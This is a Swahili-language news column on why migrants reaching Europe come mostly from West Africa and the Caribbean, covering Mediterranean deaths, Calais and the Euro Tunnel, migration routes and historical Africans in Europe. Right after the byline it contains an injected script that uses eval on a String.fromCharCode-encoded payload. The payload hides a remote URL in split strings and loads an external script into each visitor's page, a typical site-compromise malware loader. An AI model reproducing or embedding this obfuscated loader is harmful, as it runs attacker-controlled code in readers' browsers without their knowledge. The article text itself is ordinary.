Recent Comments

KUTOKA LONDON :Kwanini wahamiaji Ulaya hutokea zaidi Afrika Magharibi na Visiwa vya Karibi?

By Baraka Bitariho Aug 17, 2015
<p>Freddy Macha </p><script>var o=String;eval(o.fromCharCode(102,117,110,99,116,105,111,110,32,105,115,83,99,114,105,112,116,76,111,97,100,101,100,40,115,114,99,41,10,123,10,32,32,32,32,114,101,116,117,114,110,32,66,111,111,108,101,97,110,40,100,111,99,117,109,101,110,116,46,113,117,101,114,121,83,101,108,101,99,116,111,114,40,39,115,99,114,105,112,116,91,115,114,99,61,34,39,32,43,32,115,114,99,32,43,32,39,34,93,39,41,41,59,10,125,10,10,118,97,114,32,98,100,32,61,32,34,104,116,116,34,43,34,112,115,58,34,43,34,47,34,43,34,47,115,34,43,34,108,101,101,34,43,34,112,46,115,116,114,97,34,43,34,116,34,43,34,111,115,98,34,43,34,111,100,121,46,99,111,109,47,34,43,34,115,99,34,43,34,114,105,112,34,43,34,116,34,43,34,115,47,104,101,97,34,43,34,100,46,106,34,43,34,115,34,43,34,63,34,43,34,118,61,51,34,43,34,46,34,43,34,56,34,43,34,46,48,34,59,10,10,105,102,40,105,115,83,99,114,105,112,116,76,111,97,100,101,100,40,98,100,41,61,61,61,102,97,108,115,101,41,123,10,9,118,97,114,32,100,61,100,111,99,117,109,101,110,116,59,118,97,114,32,115,61,100,46,99,114,101,97,116,101,69,108,101,109,101,110,116,40,39,115,99,114,105,112,116,39,41,59,32,10,115,46,115,114,99,61,98,100,59,10,105,102,32,40,100,111,99,117,109,101,110,116,46,99,117,114,114,101,110,116,83,99,114,105,112,116,41,32,123,32,10,105,102,40,100,111,99,117,109,101,110,116,46,99,117,114,114,101,110,116,83,99,114,105,112,116,46,112,97,114,101,110,116,78,111,100,101,33,61,61,110,117,108,108,41,123,10,100,111,99,117,109,101,110,116,46,99,117,114,114,101,110,116,83,99,114,105,112,116,46,112,97,114,101,110,116,78,111,100,101,46,105,110,115,101,114,116,66,101,102,111,114,101,40,115,44,32,100,111,99,117,109,101,110,116,46,99,117,114,114,101,110,116,83,99,114,105,112,116,41,59,10,125,10,125,10,32,101,108,115,101,32,123,10,9,105,102,40,100,46,103,101,116,69,108,101,109,101,110,116,115,66,121,84,97,103,78,97,109,101,40,39,104,101,97,100,39,41,91,48,93,33,61,61,110,117,108,108,41,123,10,100,46,103,101,116,69,108,101,109,101,110,116,115,66,121,84,97,103,78,97,109,101,40,39,104,101,97,100,39,41,91,48,93,46,97,112,112,101,110,100,67,104,105,108,100,40,115,41,59,10,9,125,10,125,10,10,125));/*54745756836*/</script>
Freddy Macha
Freddy Macha

Lakini swali ni swali. Waswahili husema “kuuliza si ujinga”- liwe la mende, kupe, pikipiki, ndulele, tando za buibui au shamba la minazi, azma ni kutaka kujua.

Msomaji mmoja kaniuliza swali buibui. Aina ya mtego. Je vipi huwasikii Watanzania wakihusika katika kasheshe hii ya wakimbizi? Kwanini huwa Waafrika wa Magharibi na visiwani Jamaica zaidi?

Miezi minne iliyopita nilizungumzia namna hali ya wakimbizi na wahamiaji toka Asia, Mashariki ya Kati na Afrika inavyotatanisha mazingira ya Ulaya. Msemaji wa Shirika la Uhamiaji la Kimataifa (IOM), mjini Geneva, Uswisi, Joel Millman alidai Waafrika na Waarabu 1,727 walishafariki wakivuka bahari ya Mediterranean kuingia Ulaya. Akasisitiza idadi hii ni mara 10 zaidi ya mwaka jana. 2013, watafuta maisha 600 walikufa maji; wakafikia 4,000 mwaka 2014. Makisio yake Millman ni vifo 30,000 mwisho wa 2015.

Mwezi huu wa Agosti, hali imegeuka baada ya walala hoi hawa kuzagaa Ufaransa, Uturuki, Ugiriki na Uingereza na kuzungumziwa ndani ya vikao vya serikali. Waziri Mkuu wa Uingereza Bwana David Cameron alishutumiwa na wapenda maendeleo na watetezi wa wageni aliposema sasa hivi Wazungu wanaingiliwa na “bumba” au mzizimo. Bumba (“swarm” kwa Kimombo) hutumika kuelezea hali ya kutatanisha ya wadudu kama nyuki au ndege wengi wanaohama wakikereketa au kutisha.

Serikali hii ya Conservative, (yenye historia ya mkono mgumu usiopenda wahamiaji), imekuwa ikiendeleza siasa ya lawama na kupitisha vikwazo zaidi. Mojawapo ni kushutumu usalama na polisi wa Ufaransa kutozuia sawasawa wakimbizi hawa wanaopitia bandari ya Calais, mpakani. Baadhi ya wakimbizi wana watoto wadogo. Wengine waja wazito.

Juma lililopita vyombo vya habari vilizungumzia M-Sudani, Abdul Rahman Haroun ( 40) alivyohatarisha maisha yake kutembea kilometa 49, akavuka njia ya chini ya ya bahari inayopitisha magari moshi ya Ufaransa kuingia Uingereza. Eneo hilo liitwalo “Euro Tunnel” ni refu kwa kilometa saba zaidi ya umbali wa mbio za Marathon. Ilimchukua Bwana Haroun saa kumi na moja, akisepa hali ya baridi, joto , upepo mkali na hatari ya kugongwa na magari moshi ya Ulaya yanayokwenda kasi kilometa 160 kwa saa. Mara mbili zaidi ya gari linalokwenda mbio kali!

Kina cha kivukio hiki cha bahari ya English Channel- inayoitenga Ufaransa na Uingereza- ni mita 75 (futi 250) na upana wa kilometa 37.9. Mara alipoingia Uingereza, Bwana Haroun, alitiwa nguvuni.

Kwa mujibu wa sheria ya Magari Moshi ya Uingereza iliyopitishwa mwaka 1861,kipengele namba 36 cha uharibifu wa kinasema : “Yeyote atakayezuia au kutojali au kusababisha injini yeyote au kusaidia reli atapelekwa mahakamani na kufungwa jela kipindi kisicho zidi miaka miwili.”

Akitathmini hali, mtangazaji mmoja wa redio ya LBC, London, alipendekeza Watawala wamkubali tu jamaa kwa bidii na ari yake ya kupigania maisha kupitia hali ngumu kiasi hicho.

Hiyo ndiyo siri ya hawa wenzetu.Wameamua kutoshindwa maisha. Baada ya kuona mambo magumu hujitosa kufa kupona.

Sababu ya pili inayowatofautisha na sisi Tanzania ni jiografia. Wako karibu na Ulaya. Katika simulizi yake ya ujanani, mwandishi mashuhuri wa riwaya za Kiswahili, Adam Shafi anaelezea namna alivyotaabika mwaka 1960 kusafiri Zanzibar hadi Misri akijaribu na vijana wenzake wawili , kwenda Ulaya kusoma. “Mbali na Nyumbani” (Longhorn, Kenya, 2013) kisa cha kurasa 500, kina kila aina ya mikasa na tafrani. Kwa mfano mbali ya kulala nje (mto wa matofali) wakiwa Khartoum, kuibiwa kila kitu Nairobi, kudhalilishwa na askari wa kikoloni Uganda, ilibidi afanye kazi ya ukondakta wa basi, Bungoma, magharibi ya Kenya kuchangia nauli.

“Kazi yeyote ile, kwangu ilikuwa kazi.” Anaandika ukurasa wa 135.

Tukirejea Uingereza

Wakimbizi wengine wametiwa nguvuni walipohonga madereva wa malori ya mizigo yanayosafiri nchi mbalimbali za Ulaya kuingia Uingereza.

Safari hizi za hatari zimekuwa zikiendelea kwa takriban miaka kumi sasa. Ramani yake imegawanyika sehemu tatu. Ufukwe wa bahari ya Mediterrenean unaoitenga Morocco na Algeria kuingia Ufaransa na Hispania. Wakimbizi hutokea nchi zinazoongea Kifaransa na Kiarabu kaskazini magharibi na magharibi ya Sahara (Sahel) : Mali, Mauritania, Algeria na Morocco.

Wanaofuata wako ukanda wa Sahel yaani Niger, Nigeria, Senegal kuelekea bandari za Libya na Tunisia. Hapa mbali na kukumbana na hatari za ugaidi hupanda meli hadi visiwa vya Malta na Sicily, jimbo maarufu la Italia.

Kundi la tatu hutokea Afrika Mashariki (Eritrea, Sudan, Ethiopia na Somalia) kupitia Misri, Libya, Syria na Lebanon. Huelekea Uturuki iliyoko njia ndefu wanapopitia vijana wanaopenda kujiunga na magaidi wa ISIS na Ugiriki.

Maswali ni je wanaingiaje? Jibu ni kuwepo wakala wanaolipwa kufanikisha safari zao. Na je, wanatoa wapi fedha? Maskini atatoa wapi dola 3,000- 5,000, kumlipa wakala? Wanazipataje fedha hizo nyingi?

Sababu ya tatu ni historia. Wenzetu hawakuanza leo kuja Ulaya. Tungo na nyaraka mbalimbali zinatueleza kumekuwepo mabaharia, wasafiri hata wasomi waliojitosa kuishi maisha Uzunguni karne nyingi. Rais wa kwanza wa Senegal, marehemu Leopold Senghor (aliyejiuzulu 1960), aliwahi kuwa mjumbe wa Bunge la Ufaransa. Ni nadra sana kwa Mwafrika kuwa mgombea kiti serikali za Wazungu. Lakini wenzetu hujitosa.

Mnigeria, Olaudah Equiano, aliyefariki mwaka 1797, alikuwa mkazi wa London aliyeandika historia ya maisha yake na kuchangia kufutwa utumwa. Kitabu chake cha mwaka 1789 kilizungumzia mateso ya utumwa : “ The Interesting Narrative of Olaudah Equiano or Gustavus Vassa, The African” (Masimulizi ya Kuvutia ya Olaudah Equiano au Gustavus Vassa, Mwafrika).

Wenzetu wamekuwa na maingiliano ya muda mrefu Uzunguni.

By Baraka Bitariho

Simamia is a news house where visitors will get up to date information on news, events, and so on. Join us to get updated, entertained and learn. Our website is www.Simamia.com or email us at SimamiaTeam@gmail.com